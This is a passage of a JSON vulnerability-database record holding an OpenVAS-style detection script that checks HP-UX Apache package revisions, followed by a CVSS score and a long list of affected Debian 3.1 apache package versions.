\"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.APACHE\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.APACHE2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.AUTH_LDAP\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.AUTH_LDAP2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.MOD_JK\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.MOD_JK2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.MOD_PERL\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.MOD_PERL2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.PHP2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.WEBPROXY\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APCH32.WEBPROXY2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.59.12\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.APACHE\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.APACHE2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.AUTH_LDAP\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.AUTH_LDAP2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.MOD_JK\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.MOD_JK2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.MOD_PERL\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.MOD_PERL2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxws22APACHE.PHP2\", revision:\"B.2.2.8.05\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.59.12\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.APACHE2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.AUTH_LDAP2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_JK2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.MOD_PERL2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.PHP2\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"hpuxwsAPACHE.WEBPROXY\", revision:\"B.2.0.59.12\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:30:29", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_ia64.deb", "packageName": "apache-dbg", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_alpha.deb", "packageName": "apache-dbg", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_ia64.deb", "packageName": "apache-ssl", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_amd64.deb", "packageName": "apache-common", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_mipsel.deb", "packageName": "apache-ssl", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_mipsel.deb", "packageName": "apache-dbg", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_mipsel.deb", "packageName": "libapache-mod-perl", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_i386.deb", "packageName": "apache-ssl", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_m68k.deb", "packageName": "apache-perl", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_amd64.deb", "packageName": "apache", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_arm.deb", "packageName": "apache-ssl", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_arm.deb", "packageName": "libapache-mod-perl", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_arm.deb", "packageName": "apache-perl", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_hppa.deb", "packageName": "apache-ssl", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_hppa.deb", "packageName": "apache", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3.diff", "packageFilename": "apache_1.3.33-6sarge3.diff.gz", "packageName": "apache", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_sparc.deb", "packageName": "libapache-mod-perl", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_hppa.deb", "packageName": "apache-perl", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_mipsel.deb", "packageName": "apache-perl", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_mips.deb", "packageName": "libapache-mod-perl", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_arm.deb", "packageName": "apache-dbg", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_arm.deb", "packageName": "apache", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_ia64.deb", "packageName": "apache", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_s390.deb", "packageName": "apache", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_powerpc.deb", "packageName": "apache-common", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_powerpc.deb", "packageName": "libapache-mod-perl", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_alpha.deb", "packageName": "apache-perl", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_amd64.deb", "packageName": "apache-perl", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_mips.deb", "packageName": "apache-common", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_powerpc.deb", "packageName": "apache-dbg", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_sparc.deb", "packageName": "apache-common", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33.orig", "packageFilename": "apache_1.3.33.orig.tar.gz", "packageName": "apache", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_m68k.deb", "packageName": "apache-ssl", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_mips.deb", "packageName": "apache", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_mipsel.deb", "packageName": "apache", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_mips.deb", "packageName": "apache-perl", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_powerpc.deb", "packageName": "apache-perl", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_m68k.deb", "packageName": "libapache-mod-perl", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_sparc.deb", "packageName": "apache-dbg", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3.dsc", "packageName": "apache", "arch": "src", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_amd64.deb", "packageName": "libapache-mod-perl", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_mips.deb", "packageName": "apache-ssl", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-doc_1.3.33-6sarge3_all.deb", "packageName": "apache-doc", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_i386.deb", "packageName": "libapache-mod-perl", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_ia64.deb", "packageName": "apache-common", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_s390.deb", "packageName": "libapache-mod-perl", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_m68k.deb", "packageName": "apache", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_m68k.deb", "packageName": "apache-common", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_alpha.deb", "packageName": "libapache-mod-perl", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_arm.deb", "packageName": "apache-common", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_hppa.deb", "packageName": "libapache-mod-perl", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dev_1.3.33-6sarge3_all.deb", "packageName": "apache-dev", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_mips.deb", "packageName": "apache-dbg", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.29.0.3-6sarge3", "packageFilename": "libapache-mod-perl_1.29.0.3-6sarge3_ia64.deb", "packageName": "libapache-mod-perl", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_hppa.deb", "packageName": "apache-common", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_sparc.deb", "packageName": "apache-perl", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_ia64.deb", "packageName": "apache-perl", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_amd64.deb", "packageName": "apache-ssl", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_i386.deb", "packageName": "apache-dbg", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_i386.deb", "packageName": "apache", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-utils_1.3.33-6sarge3_all.deb", "packageName": "apache-utils", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_s390.deb", "packageName": "apache-dbg", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_m68k.deb", "packageName": "apache-dbg", "arch": "m68k", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_i386.deb", "packageName": "apache-perl", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_sparc.deb", "packageName": "apache-ssl", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_mipsel.deb", "packageName": "apache-common", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_alpha.deb", "packageName": "apache", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_s390.deb", "packageName": "apache-ssl", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_hppa.deb", "packageName": "apache-dbg", "arch": "hppa", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-perl_1.3.33-6sarge3_s390.deb", "packageName": "apache-perl", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_powerpc.deb", "packageName": "apache", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_alpha.deb", "packageName": "apache-common", "arch": "alpha", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_powerpc.deb", "packageName": "apache-ssl", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-dbg_1.3.33-6sarge3_amd64.deb", "packageName": "apache-dbg", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache_1.3.33-6sarge3_sparc.deb", "packageName": "apache", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-common_1.3.33-6sarge3_s390.deb", "packageName": "apache-common", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "3.1", "packageVersion": "1.3.33-6sarge3", "packageFilename": "apache-ssl_1.3.33-6sarge3_alpha.deb", "packageName": "apache-ssl", "arch": 